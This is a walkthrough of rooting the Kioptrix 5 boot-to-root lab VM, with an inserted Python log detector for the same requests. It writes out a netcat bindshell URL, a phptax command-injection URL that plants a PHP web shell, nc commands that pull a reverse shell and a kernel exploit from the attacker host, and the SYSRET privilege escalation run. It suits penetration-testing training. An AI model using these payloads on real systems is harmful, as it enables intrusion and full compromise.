Rooting Kioptrix 5 Walkthrough

Overview

Kioptrix 5 is a boot-to-root (B2R) VM designed for students to practice vulnerability analysis and exploitation. The objective is to root the virtual machine by exploiting its vulnerabilities, leading to full system compromise.

Vulnerabilities Exploited:

  • Local File Inclusion
  • Remote Command Execution in the phptax application
  • FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 2014 (Final) VM in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap

Reconnaissance/Scanning

#netdiscover

root@kali:~# netdiscover

 Currently scanning: 192.168.14.0/16   |   Screen View: Unique Hosts                                                               
                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname     
 -----------------------------------------------------------------------------
 192.168.8.103   00:0c:29:75:b1:92      1      60  VMware, Inc.   

Target VM IP Address: 192.168.8.103

Scanning with nmap

root@kali:~# nmap -p- -A 192.168.8.103
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 23:27 EDT
Nmap scan report for 192.168.8.109
Host is up (0.00059s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE VERSION
22/tcp   closed ssh
80/tcp   open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open   http    Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 00:0C:29:75:B1:92 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.59 ms 192.168.8.103
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 136.26 seconds
 

Let's explore the services on the open ports. I found that a web server is running on port 8080, but its resources are forbidden (HTTP 403), so we don't have access to this server yet.

Moving on, the default page is shown for the website on port 80.

Viewing the page source gives us a hint: a comment pointing to the pChart 2.1.3 application.

Here is our pChart application.

Exploitation

Let's search Exploit-DB for pChart exploits.

root@kali:~# searchsploit pChart 2.1.3
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
pChart 2.1.3 - Multiple Vulnerabilities                                                     | exploits/php/webapps/31173.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

So there is a directory traversal vulnerability that allows us to read arbitrary files from the server.

Next, we are forbidden to access any resource on port 8080, and that restriction is configured in the web server's httpd.conf. So let's read httpd.conf through the traversal, see what the configuration does, and work out how to bypass the restriction.

As we can see, only browsers whose User-Agent string matches ^Mozilla/4.0 are allowed access to the server.

So I overrode the user agent string in Firefox to Mozilla/4.0.

The new string created in about:config is general.useragent.override with the value Mozilla/4.0.

Access to the server is granted.

Now we find the phptax application. Let's search for exploits, and, guess what, there is a Remote Command Execution vulnerability: we can execute arbitrary commands on the server.

root@kali:~# searchsploit phptax
-------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title                                                                              |  Path (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------- ----------------------------------------
PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)                              | exploits/php/webapps/21833.rb
PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution                           | exploits/php/webapps/25849.txt
phptax 0.8 - Remote Code Execution                                                          | exploits/php/webapps/21665.txt
-------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Let's read through the exploit code.

root@kali:~# cat /usr/share/exploitdb/exploits/php/webapps/21665.txt
-----------------------------------------------------
phptax 0.8 <= Remote Code Execution Vulnerability
-----------------------------------------------------
 
Discovered by: Jean Pascal Pereira <pereira@secbiz.de>
 
Vendor information:
 
"PhpTax is free software to do your U.S. income taxes. Tested under Unix environment.
The program generates .pdfs that can be printed and sent to the IRS. See homepage for details and screenshot."
 
Vendor URI: http://sourceforge.net/projects/phptax/
 
----------------------------------------------------
 
Risk-level: High
 
The application is prone to a remote code execution vulnerability.
 
----------------------------------------------------
 
drawimage.php, line 63:
 
include ("./files/$_GET[pfilez]");
 
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
 
----------------------------------------------------
 
Exploit / Proof of Concept:
 
Bindshell on port 23235 using netcat:
 
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 
** Exploit-DB Verified:**
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
 
----------------------------------------------------
 
Solution:
 
Do some input validation.
 
----------------------------------------------------
root@kali:~#

We want to execute this command on the server shell:

echo "<?php system(\$_GET['cmd']); ?>" > shell.php

This command creates a simple PHP shell that executes whatever command is passed in the cmd parameter.

http://192.168.8.103:8080/phptax/drawimage.php?pfilez=xxx;%20echo%20%22%3C%3Fphp%20system($_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make

Our shell is uploaded at http://192.168.8.102:8080/phptax/shell.php and we can execute commands. Let's find out whether wget or nc is installed on the server.

nc is installed.

Let's use nc to get an interactive shell. We will upload pentestmonkey's PHP reverse shell, transferring it with netcat.

root@kali:~# nc -nvlp 1234 < /var/www/html/shell.txt

listening on [any] 1234 ...

On the server, we fetch the PHP shell with this command.

nc 192.168.8.102 1234 > rshell.php

http://192.168.8.103:8080/phptax/shell.php?cmd=nc%20192.168.8.102%201234%20%3E%20rshell.php

So our rshell.php is uploaded. Let's access rshell.php in the browser and receive the reverse netcat connection.
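As an added example (not part of the original walkthrough), here is a small Python detector run over constructed Apache access-log lines; it flags the three request patterns used above: the pChart path traversal, the phptax pfilez command injection, and a bare Mozilla/4.0 User-Agent that exists only to satisfy the httpd.conf allow rule. The log lines, the pChart parameter name Script and the regexes are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the original post): a pChart traversal,
# the phptax pfilez injection from the walkthrough, and a benign phptax request.
SAMPLE_LOG = """\
192.168.8.102 - - [30/May/2018:23:40:01 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fapache22%2Fhttpd.conf HTTP/1.1" 200 4012 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.8.102 - - [30/May/2018:23:45:12 -0400] "GET /phptax/drawimage.php?pfilez=xxx;%20echo%20%22%3C%3Fphp%20system($_GET%5B%27cmd%27%5D);%20%3F%3E%22%20%3E%20shell.php&pdf=make HTTP/1.1" 200 31 "-" "Mozilla/4.0"
192.168.8.102 - - [30/May/2018:23:46:03 -0400] "GET /phptax/drawimage.php?pfilez=1040d1-pg2.tob&pdf=make HTTP/1.1" 200 8123 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"
"""

# Apache combined log format: client, ident, user, [time], "request", status, size, "referer", "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
TRAVERSAL = re.compile(r'(^|/)\.\.(/|$)')   # a ".." path segment after decoding
SHELL_META = re.compile(r'[;|&`<>]|\$\(')  # characters that break out of the exec() string

def decode_fully(value, rounds=3):
    # Percent-decode repeatedly so double-encoded payloads are not missed.
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def query_params(query):
    # Split the raw query on '&' only: a literal ';' is part of the value, not a separator.
    for pair in query.split('&'):
        name, _, value = pair.partition('=')
        yield unquote(name), value

def classify(line):
    # Return (client ip, path, findings) for one log line, or None if it does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group('target'))
    findings = []
    for name, raw in query_params(url.query):
        value = decode_fully(raw)
        if TRAVERSAL.search(value):
            findings.append(('path-traversal', name))
        if url.path.endswith('/drawimage.php') and name == 'pfilez' and SHELL_META.search(value):
            findings.append(('command-injection', name))
    if m.group('ua').strip() == 'Mozilla/4.0':  # bare UA equal to the allow-rule prefix
        findings.append(('spoofed-user-agent', 'User-Agent'))
    return m.group('ip'), url.path, findings

def scan(log_text):
    # Keep only the parsed lines that produced at least one finding.
    return [r for r in map(classify, log_text.splitlines()) if r and r[2]]
```

Running scan(SAMPLE_LOG) reports the first two requests and leaves the benign third one alone.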

Privilege Escalation

$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64


The kernel is FreeBSD 9.0-RELEASE on amd64, which is affected by the Intel SYSRET privilege escalation bug; the exploit is at https://www.exploit-db.com/exploits/28718/

On kali linux: #nc -nvlp 12345 < exploit.c

I transferred this C exploit to the server using nc, then compiled it, executed it, and rooted the machine!

$ nc 192.168.8.102 12345 > /tmp/exploit.c
$ cd /tmp
$ gcc -o exploit exploit.c
$ ./exploit
[+] SYSRET FUCKUP!!
[+] Start Engine...
[+] Crotz...
[+] Crotz...
[+] Crotz...
[+] Woohoo!!!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

References

https://www.vulnhub.com/entry/kioptrix-2014-5,62/

https://www.exploit-db.com/exploits/28718/
